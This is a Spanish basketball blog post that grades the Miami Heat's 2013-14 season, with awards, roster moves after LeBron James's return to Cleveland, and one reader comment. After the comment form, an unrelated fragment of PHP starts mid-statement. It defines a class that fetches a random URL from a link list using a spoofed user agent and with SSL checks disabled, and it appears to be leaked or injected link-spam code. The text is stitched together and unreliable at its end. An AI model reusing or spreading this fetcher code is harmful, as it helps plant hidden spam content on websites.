Miami Heat: Notable Alto

19 de August de 2014 por Sancho88

“Pat Riley intentará convencer a su ‘Big Three’ para que ejerza la player option que les vincule con los Heat hasta 2016, pero la realidad la dictarán los resultados. Es probable que si LeBron no consigue su tercer anillo, renuncie este verano a dos años más de contrato con Miami por firmar el mejor contrato de su vida con Lakers, Celtics, o, por qué no, con sus añorados Cavaliers.”

Cuando nos da por jugar a ser adivinos en el blog a veces suceden cosas tan curiosas como esta. Es verdad, no acertamos el subcampeonato de los Heat, e incluso nos quedamos muy lejos de la predicción de victorias en temporada regular (les dimos 61 y consiguieron ‘solo’ 54) pero teníamos muy claro que el verano de 2014 quedaría marcado para bien o para mal por los resultados deportivos.


El ‘threpeat’ no era tan utópico para un equipo como los Heat pero esta vez el hueso duro del Oeste se les volvió a atragantar. San Antonio Spurs culminó un proyecto legendario capaz de ganar en tres décadas distintas. La diosa del baloncesto les devolvió lo que les debía tras el triple de Ray Allen de 2013 y los emperadores Leonard y Diaw devolvieron al gran trío (Duncan, Ginobili y Parker) su corona de campeones. Confiábamos en que Wade y Bosh saliesen al rescate de LeBron cuando las dificultades apremiasen pero “King” James se vio más solo que nunca y además, si hemos de ser sinceros, no vimos ni rastro de la defensa de Miami de los dos títulos consecutivos. Los Heat fueron el monigote del Este que tenía que perder ante una auténtica exhibición de juego colectivo, posiblemente la mayor que hayamos visto jamás, como remarcó Deer en el resumen de la final. Dicen que el deporte es un estado de ánimo, y seguramente ese fue el factor diferencial para explicar el 4-1 de San Antonio sobre Miami.

Sin embargo, en general la temporada fue similar a la de los campeonatos. Con un 24-7 a 1 de enero estaba claro que los Heat volverían a competir por el anillo. Quizá no mostraron mucha ambición en el ‘rush’ final de temporada, en el que firmaron un decepcionante 2-8 de cara a los Playoffs que muchos interpretaron tan solo como una estrategia conservadora para encarar la lucha por el campeonato. Con Durant postulándose claramente a MVP de la temporada, LeBron perdió parte de la motivación para competir antes de los Playoffs. Lo cierto fue que los Heat no aprovecharon el desplome general de los Pacers pero no conseguir el factor cancha en las finales tampoco fue un factor determinante para explicar su hundimiento.

Sí pudo serlo en cambio la salida de Mike Miller a los Grizzlies, o el poco entendimiento de Spoelstra con secundarios como Micheal Beasley y Greg Oden, a los que apuntábamos como líderes de la segunda unidad. Por lo demás, el declive de Shanne Battier y Udonis Haslem, la presencia siempre a fogonazos de Rashard Lewis y, sobre todo, la reducción física de Dwayne Wade a su mínima expresión explican el fracaso del colectivo Heat. LeBron James y Chris Bosh mostraron un nivel All-Star durante todo el año, supliendo los numerosos achaques de Wade, que a sus 32 años se ha quedado sin las rodillas que le hacían parecer leyenda. Si muchos jugadores terminan sus carreras cerca de los 40 años como Duncan, Garnett o Allen, no sabemos si Wade seguirá más allá de 2016, año en el que expira su nuevo contrato. Es evidente que no tiene un nivel físico adecuado para ser el líder principal en un equipo aspirante. y esa es la razón real por la que se ha disuelto este ‘Big Three’. Analizando los motivos de LeBron para tomar su decisión 2.0 parece bastante probable que el pobre nivel que ha ofrecido Wade en las finales ha sido el principal desencadenante de su salida del equipo. James podría haber firmado la ‘millonada’ que quisiera con los Heat, como ha hecho Carmelo en Nueva York, pero ha preferido optar por una salida más ‘creativa’.

Y así es como se cierran los ciclos. Si en 2010, el verano clave de la generación de 2003, todos temblábamos al vislumbrar el megalito de estrellas que iban a formar 3 de los 4 alumnos más aventajados de su generación, tras el 4-1 de San Antonio las sensaciones eran totalmente opuestas. En el recuerdo nos quedarán siempre las 4 finales consecutivas de estos Heat, el animal competitivo por excelencia de la nueva década. Se llevaron solo 2 pero perfectamente pudieron ganar las 4 o quedarse en 1 anillo. Pero al final parece que el baloncesto hace justicia. Este es el final de un sueño, el sueño de Pat Riley. Puso sobre la mesa toda su influencia, reunió a tres súper cracks prodigiosos de la canasta y apostó su dinero por encima del impuesto de lujo a un equipo que fue capaz de renunciar a muchos millones para ser campeones. No le vendieron su alma al diablo por un máximo salarial, y por eso fueron bicampeones. Un honor haberles podido disfrutar. Sobre el futuro; no hay mucho futuro en Miami. LeBron no tiembla al tomar las decisiones. No lo hizo en 2010 y no lo ha hecho tampoco este verano al firmar por los Cavaliers. Miami vuelve a ser un desierto, adornado tal vez con el cáctus poderoso de Texas, Chris Bosh, pero en riesgo evidente de abandono. Se acabó el sueño de Riley. LeBron James vuelve a casa.

PREMIOS

MVP: LeBron James. Sin él nada de esto habría ocurrido. Le dio 2 anillos a Miami,  fue MVP de la liga 2 de sus 4 temporadas como Heat, logró 2 MVP’s de las finales y peleó contra los Spurs 2014 hasta el agotamiento. Nada se le puede reprochar de su paso por Florida. Supo levantar un proyecto que se resquebrajaba tras la final perdida contra los Mavericks en 2011. Confió en Mario Chalmers como Bryant lo hizo con Fisher, lideró un vestuario obediente y pacífico gracias a su carisma, se convirtió en un hombre, dentro y fuera de la cancha. Miami Heat fue el antes y el después de LeBron James. Tras estos 4 años el niño de Akron que se fue de los Cavs de manera altanera y bastante prepotente, vuelve con la humildad del guerrero que ya ha visto mucha sangre en su camino. Solo por la carta que les ha escrito a sus amigos de Cleveland merece este MVP. Borra de un plumazo la otra carta de Dan Gilbert y se reconcilia con su pueblo. Ahora les llevará muy lejos probablemente.

Sorpresa: Ray Allen. Si en 2013 suyo fue el triple que devolvió a la vida a los Heat en el sexto partido de las finales, en 2014 su espectacular mate en el primer partido de la serie contra los Spurs pudo ser un factor diferencial a favor de su equipo. A sus 39 años calificar a Allen de sorpresa puede ser sinónimo de ofensa pero en este caso lo es de admiración. Después de una carrera plagada de éxitos, con dos anillos a sus espaldas, el californiano está meditando seriamente su retirada. Se especula con que pueda firmar un año más con los Cavaliers de LeBron y así jugar hasta los 40 años pero si decide retirarse ahora mismo ya será leyenda para siempre. Allen es el mejor tirador de todos los tiempos y el guía espiritual de una generación que soñaba con los Supersonics de Seattle y con Jesús ‘Suttlesworth’. Nos quitamos el sombrero ante la temporada de ‘Sugar Ray’ que contra todo pronóstico volvió a ser un jugador muy importante en las finales.

Decepción: Dwayne Wade. Estuvo perdido en las finales. Su ‘flopping’ clamoroso simulando una falta de Ginobili fue el reflejo de su estado físico. No hizo malos Playoffs en general, y mientras estuvo sano fue una gran ayuda para LeBron en la regular y en postemporada pero su final no pasará a la historia. Muy malos porcentajes de tiro, pocos puntos, casi 4 pérdidas por partido y una defensa sonrojante que permitió tiros muy fáciles para Spurs. Wade llegó sin gasolina a las finales y su equipo lo pagó. En el momento en el que más se le necesitaba ‘Flash’ no estuvo. Spoelstra tendrá que dosificarlo aún más si cabe la próxima temporada.

Esfuerzo en vano: LeBron James. Hizo cualquier cosa por el ‘Threepeat’. Firmó un espectacular 57% en tiros de campo en las finales, con un 52% en triples, algo impensable para ‘King’ James. Su 28-8-4 habría valido si Wade hubiera mantenido el nivel del resto de Playoffs y Bosh hubiera dado un paso adelante. Pero el ‘Big Three’ se quedó cojo de dos patas.

JUGANDO A GM

No es el mejor momento para ponerse en el pellejo de Pat Riley. Cuando pierdes al mejor jugador del mundo y a uno de los 10 mejores jugadores de toda la historia el resto del cuento carece de mucha importancia. Es evidente que el fichaje de Luol Deng reemplaza con lo mejor que había en el mercado la salida de LeBron James porque a mediados de Julio la carne fresca (Carmelo, Gasol y el propio James) ya había decidido su destino. De esta manera Miami Heat seguirá siendo un ‘contender’ bastante serio en el Este, con Chris Bosh como jugador franquicia y Wade y Deng formando una gran pareja en el juego exterior. No obstante, Spoelstra tendrá que volver a crear un proyecto un poco extraño. Toda la estructura del equipo estaba hecha por y para LeBron James, y ahora hay que cambiarlo todo de sitio. Se podría haber optado por una reconstrucción profunda y oscura al estilo ‘cavalier’, pero Riley ha sido valiente optando por mantener parte de lo que había y fichar a Luol Deng.

Por lo demás, ha habido grandes despedidas en Miami. No solo se va LeBron. Shane Battier, un jugador que llegó a la NBA con hálito de estrella al lado de nuestro Gasol, se retira muy joven, con 35 años. Nunca llegó a convertirse en ese jugador total que parecía ser pero sin duda sus últimos 3 años en Miami fueron los mejores de su carrera. Para el recuerdo quedarán sus finales en 2012 y 2013, donde jugó hasta de ala-pívot, defendió a Durant y Duncan y masacró desde el triple a OKC y Spurs en momentos clave. Un superclase desde el banquillo con un nivel de auto exigencia y competitividad propios del proyecto James.

Ray Allen también se va, mejores números en su carrera que Battier pero un protagonismo igual de fundamental en estos Heat. Sin ellos dos no se podrían entender las 4 finales y los 2 anillos. Aún no está decidido si Allen se retira o juega un año más con LeBron en los Cavs, pero lo que sí es seguro es que no continuará en estos Heat. También se han ido, estos con más pena que gloria, los Rashard Lewis, James JonesMichael Beasley y Greg Oden. Los dos últimos llegaron para ser importantes pero Spoelstra no los pudo admitir en su sistema, no los vio preparados para competir en las finales. Lewis fue muchas veces titular en Playoffs en 2014, pero ya no está para estos trotes. Prueba de ello es que ni siquiera pasó las pruebas físicas de los Mavericks. Y James Jones seguirá los pasos de LeBron siendo ese tirador letal que tan pocas muescas de su clase nos deja ver por temporada. Su paso por Miami ha sido totalmente testimonial. Igual que Toney Douglas, del que se esperaba muchísimo más.

Por el contrario, llegan al equipo Deng como ya hemos comentado, y también Josh McRoberts y Danny Granger. Estos dos, junto con la llegada del Rookie Shabazz Napier parecían grandes complementos para luchar un año más por el título. Fueron los últimos movimientos desesperados de Pat Riley para convencer al Rey. Pero no le convencieron, y ahora tendrán que adaptarse a nuevos roles que no están demasiado claros.

Siguen también en el equipo Mario Chalmers y Norris Cole, además de Chris Andersen y Udonis Haslem en la pintura. Por su parte, el rookie James Ennis ha convencido a la directiva gracias a las Summer Leagues y tendrá un puesto en la plantilla. Por último, llegan para rellenar el equipo Shawne Williams y Reggie Williams. Poco más que añadir. Parece la plantilla cerrada, como GM no renovaría a Justin Hamilton, sobre quien existe una Team Option, pero el resto ya está cerrado. Faltaría saber cómo va a quedar el proceso judicial por maltrato familiar al que se enfrenta Greg Oden, que podría pasarse 6 años en la cárcel, y también el futuro de Michael Beasley, que apunta a Lakers. Como GM me pensaría la renovación de Beasley para darle algún protagonismo como ala-pívot, pero realmente carece de importancia un jugador así. No lo contrataría seguramente.

Así quedará el equipo para el año que viene:

PG: Mario Chalmers, Shabazz Napier, Norris Cole
SG: Dwayne Wade, Reggie Williams, Tyler Johnson
SF: Luol Deng, Danny Granger, James Ennis, Shawne Williams
PF: Josh McRoberts, Udonis Haslem
C: Chris Bosh, Chris Andersen

Un equipo ex campeón sin su figura principal. Veremos si siguen compitiendo o no logran sobreponerse a la salida de LeBron James.

Comenta

Un comentario a esta entrada

  1. MagicJohnson32 dice:
    #1

    Creo que no solo seguirán compitiendo sino que rondarán el top 4 del Este. Obviamente van a notar, y mucho, la marcha de LeBron, pero la plantilla que ha conseguido montar Riley es de lo mejor de la conferencia. La gran duda es si a Wade le queda gasolina para ser primera opción. Es una duda grande, claro, pero aun así los veo arriba.

    Sobre la temporada 13-14, no la veo de notable alto. Su regular season fue gris, con un balance de 52-28, empatado con Portland y Houston, y por detrás de Spurs, Thunder, Indiana y Clippers. Para muchos, llegar a las finales sería un éxito histórico, pero para el vigente campeón, conforme está el Este (y con los Pacers en modo autodestrucción), es lo mínimo. Y en las finales pasó lo que pasó. Aprobado sin más.

    Por lo demás, gran análisis del final de la era LeBron para Miami.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>